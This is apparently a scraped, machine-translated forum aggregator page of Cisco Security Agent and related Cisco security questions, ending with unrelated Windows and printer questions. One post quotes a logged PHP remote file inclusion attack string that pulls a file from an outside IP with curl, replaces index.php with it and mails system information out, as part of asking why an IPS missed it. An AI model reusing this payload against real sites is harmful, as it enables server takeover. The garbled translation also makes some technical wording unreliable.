Cisco security agents - Solaris zones
Hello
If anyone can help in question with the CSA?
Are there official information that Cisco Security Agent cannot be installed on Solaris zones. Information on versions of Solaris, but not on the areas of release notes.
Please visit the following link:
The requirements for Solaris systems officer
http://www.Cisco.com/en/us/docs/security/CSA/CSA601/Release_notes/CSA601RN.html#wp196425
SongL
Tags: Cisco Security
Similar Questions
-
Cisco Security Agent cannot close port 135/tcp on Windows hosts
Hello
I met with the problem that Cisco Security Agent cannot close port 135/TCP on PC windows (XP or Win7).
I configured the network access control module to prevent all client/server connections to port tcp/135 of the rule.
I checked my police using nmap, so this port (TCP/135) 20 minutes shows as filtered and I see connect event monitor on the CSA MC, over the next 20 minutes he see as open and no newspaper doesn't show. (not exact time, then it maybe 30 minutes or 5, this varies)
Can someone explain how TCP/135 works and it is possible to close it using the CSA?
Thanks in advance
There is another question for the same problem on the forums (see: CSA 6.0.2.145 problem with windows firewall 7). I wrote: -.
"I advanced and tested in the laboratory with winXP and CSA 602-149 (later). I've defined a rule with DENY tcp/135 and ran the nmap and reports of open (wireshark performances to the syn syn - ack). I changed it to a REFUSAL of PRIORITY and now closed nmap reports (wireshark shows restore the syn). Through the CLI, netstat - a watch the pc listening on tcp/135 & disabling the syn CSA Gets the syn - ack response. For me, this means a few flaws. 1: DENY should block tcp135 syn & 2: CSA does not send reset (it needs to be reset). Is it possible to open a TAC case and put my name (mwinnett) in it, and I'll open a defect. »
Matthew
-
When Cisco Security Agent 6.0.2 comes out?
When Cisco Security Agent 6.0.2 comes out? Go off the 32-bit operating system and on Windows 2008 64 - bit OS.
Scheduled for this month.
-
Windows 2003 & Management Center for Cisco Security Agents
I'm sorry if this question has been asked before, but I was unable to see the answer here.
The management center of CiscoWorks for Cisco Security Agents can be installed on a Windows 2003 Server?
I'm asking because I am that it is difficult to find a new server that comes with Windows 2000.
I'm not in the office at the moment, but I think the version I have is 4.5.
Thank you
Ian
You're welcome and good luck.
-
PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?
Does anyone know what signing this feat should trigger with the Cisco IPS sensor? You are not sure if there is one, or if we turned it off?
We see this feat hit our Exchange servers several times during the week.
The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.
I think that this could be the exploit of mambo. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass" here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.
Hope this helps
M
-
Cisco Secure ACS 5.3 SNMP agent does not
Hello
I have problems with the SNMP on Cisco Secure ACS 5.3 agent (patch level 5) stop, is there a quick way to restart the SNMP daemon via the command line?
Robert,
I understand where you come, I encountered the following bug:
The process of the SNMP agent in demon device ACS stops.
and reboot the box will bring him back to the top and after about 3 days, he'd stop. I just want to see if it's the same bug that could be back in patch 5. The best thing to do at this stage is to plan a quick down and restart the box to see if the snmp process starts again. If this then gives IT a week to see if the snmp Protocol falls down. If it does then make reference to this bug and open a new case of tac for repair. If not, then you should be in the clear.
Thank you
Tarik Admani
-
Cisco Secure ACS Solution Engine ping
1. I installed Cisco Secure ACS Solution Engine with V3.3 and I can access via the http port 2002 but I can't it ping from anywhere in the network, but the server can ping every thing, is this normal.
2. If I can't ping haw I can define the service keeplaive to load balance 2 ACS engine using CSS
By the way, I forgot that ACS 3.3 device has a CSA integrated. This agent is enabled by default. He explains why you can't ping it.
For enable/disable it, go to "System Setup Configuration - device. Toggle the checkbox enabled the CSA according to needs.
Rgds,
AK
-
Cisco Security Manager integration with Cisco ACS troubleshooting
Hi all!
I have a problem with the integration between Cisco Security Manager and ACS. I've done the integration, but the identity of the user system doesn't have enough privileges. I know what the problem is, but I don't know how I can change the login of the ACS to the local MSC?
I found a file that specifies the following:
Q.
Is there a backend script or command line interface options to change the ACS to local CicsoWorks connection module?
A.
To restore the server LMS ACS local user mode mode, stop the CiscoWorks
demons and run the following script:
NMSROOT/bin/perl ResetLoginModule.pl
(for Solaris)
NMSROOT\bin\perl ResetLoginModule.pl
(for Windows)
Then, restart the daemon.
I did it, but does not work, any idea?
Hello
I guess you can try to go through the question on WSC and GBA integration troubleshooting:
Few things might have gone wrong:
1 - this command must be run on the server MCS cmd prompt (make sure that you are not on the client computer)
2 - NMSROOT is the directory were MSC Server is installed. Is usually c:\Progra~1\CSCOpx
3. you must stop the deamon Manager before performing this action (and restart)
For example if the directory is the one above to reset the connection locally, you can try the following:
net stop crmdmgtd---> that stops the daemon Manager (can be done by the services window)
c:\Progra~1\CSCOpx\bin\perl c:\Progra~1\CSCOpx\bin\ ResetLoginModule.pl---> restores local authentication
net start crmdmgtd---> restart the Daemon Manager
Can you maybe try again and let me know how it goes?
Thank you
-
original title: genric hosted agent services
Description
The failing Application path: C:\Program Files (x 86) \Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe
Signature of the problem
Problem event name: APPCRASH
Application name: svcGenericHost.exe
Application version: 3.5.0.1163
Application timestamp: 4d9d3841
Fault Module name: StackHash_0a9e
Fault Module Version: 0.0.0.0
Fault Module Timestamp: 00000000
Exception code: c0000005
Exception offset: 74676c9c
OS version: 6.1.7601.2.1.0.768.3
Locale ID: 1033
Additional information 1: 0a9e
More information 2: 0a9e372d3b4ad19135b953a78882e789
Additional information 3: 0a9e
Additional information 4: 0a9e372d3b4ad19135b953a78882e789
Additional information about the problem
Bucket ID: 2507689456
Maybe you shouod check with Trendmicro support.
-
Client NFS in Solaris zone monitoring
Hello
We have servers SUN Solaris 10 zones. Areas are running as NFS clients in addition to applications.
Correct me that BB does not support Solaris zones? If so, how to monitor the connectivity status of the NFS clients in areas?
Thanks in advance.
Unfortunately, I'm not too familiar with the installation like this.
Is that what you have already installed a BB client in this area? By the sound of it, I wound't install the BB top due to the compoenent NFS server. It would be a single point of failure.
-
There is a problem that is coming with the customers, sometimes on some of the connection start screen customer Cisco NAC Agent is not displayed on the login screen for some of the newly added machines. Are there special requirements for cisco Agent on the client machines.
Concerning
Waqas
Waqas,
No specific requirement, except that they be on the list of the OS supported. For example server OSs don't are not so supported if you were trying to install/run on a Server 2003 or 2008, which will not work.
HTH,
Faisal
-
API License - Cisco Security Manager
I would like to know the license API to integrate a solution Algosec Cisco CSM. This license would cost or not?
Q. what are the features of the API?
A. based on the API access Cisco Security Manager to share information with other services essential network such as respect and analysis of advanced security systems to streamline their operations, security and compliance. Using a representational state transfer, external firewall compliance systems can directly request access to data from any security device managed by the Cisco Security Manager. Several suppliers of conformity of safety including Tufin Algosec and Skybox, have updated their products to work with the new APIs in the Cisco Security Manager
http://www.Cisco.com/en/us/prod/collateral/vpndevc/ps5739/ps6498/qa_c67-727089.html
I'm waiting for return,
Aldo Melo Lopes
Yes. The fare is US$ 5,000.
The product number is 'L-CSMPR-API' (Cisco Security Manager Pro - license for access to the API).
-
I would like to implement Cisco Security Manager demo and requirement, I have about 500 devices
I want to implement Cisco Security Manager .demo and requirement, I have about 500 aircraft and which is sutabale also want to access VPN management
And what is your question?
-
Hello
I have a question about Cisco Security manager. We manage approximately 70 firewalls and bought the MSC to manage with policies, etc.
Is it possible to make changes in SSH or ASDM If Cisco Security Manager is inaccessible?
I need a way to backup for the configs before I can deploy.
Any advice will be appreciated
Kind regards
Ian Oliver
You can always return to the local management.
If you do, you need to be sure to use functionality of the CSM 'Detect changes in band.
http://www.Cisco.com/c/en/us/TD/docs/security/security_management/Cisco _...
You need to reconcile and integrate those changes in band CSM once it is available / accessible so that it fit, any change in its baseline for the camera - otherwise he crushes them in the next deployment.
-
Import batch of the NAS Cisco Secure v2.6?
Hiya,
We run Cisco Secure v2.6 & want to add all our routers in as "Network access servers" so that we can authenticate NT accounts.
The problem we have is not with the configuration but the addition of some 300 routers - quite a long process I'm sure you can imagine!
Anyway is batch import all of these routers - in a similar way to the users? Tried passing the various parameters in the URL, but this doesn't seem to work (think theres some smart java EFS it or aomething).
Any suggestions would be received gratefull!
Paul Woolnough
In addition to capacity CSUtil documented at
(CiscoSecure ACS database command line Utility), CSutil can also be used to import the NAS devices. It will import from a text file that lists the NAS so devices that their (local significance only) host name, ip address, key and Protocol.
This is a sample file represents the syntax/format used for this import:
ONLINE
ADD_NAS:Router1:IP:10.31.1.51:key:Cisco:vendor:CISCO_T +.
ADD_NAS:Router2:IP:10.31.1.52:key:Cisco:vendor:CISCO_R
Here we see two NAS devices listed - ROUTER1 and ROUTER2, both using the key "Cisco", and the ip addresses are easy enough to identify it. And since ROUTER1 lists the parameter ' CISCO_T + ', it will be imported as using Ganymede +; We see a similar format to the NAS ROUTER2, which will be imported as using RADIUS.
With the keyword "ONLINE" at the beginning of the file, the NAS devices will be imported while ACS is still running. It is a slow process, but it allows importing unfold without downing the ACS server. If you want to interrupt the services ACS temporarily while you perform this import, you can replace 'OFFLINE' to 'ONLINE '. Importation would complement then much faster.
So the first task would be to build a text file using the format above, and for our example, we will say this file was named fred.txt. Once this file is created, you will need to copy this file in the following directory:
C:\Program Files\CiscoSecure ACS v2.6\Utils
And then at a command prompt, navigate to the same directory and run this command:
CSUtil-i fred.txt
Maybe you are looking for
-
How can I turn off automatic calculation?
I have a large data base and file whenever I have edit or add entries, numbers to recalculate the results of the formula. As this is a large file, it requires a lot of processing power. Is there a way I can disable it? I know that Excel has this opti
-
El Capitan fails miserably through many programs. How to uninstall it?
Updated at El Capitan 10.11.3. Scroll bars do not appear in several programs. Photo download disabled in 3rd party programs. Bluetooth does not connect to the iPhone 5 s. Safari S-L-O-W in all directions. S-L-O-W to delete emails. I need to get back
-
Forest consist of 1 DC server 2003 with all fsmo and 2000 1 domain controller roles. Completed all questions of adprep and when I tried to promote server 2008 standard edition to a domain controller, had the error message stating that Active Director
-
I have my screensaver set to activate after 4 minutes and I chose of the standard screensavers provided by Microsoft. The screen saver will activate after the selected time. I tried to change the time/screensaver without result.
-
Dymo 400 Turbo device driver cannot be installed
I downloaded the driver from Dymo, but when the rubber meets the road, the printer will not work because the driver cannot be installed.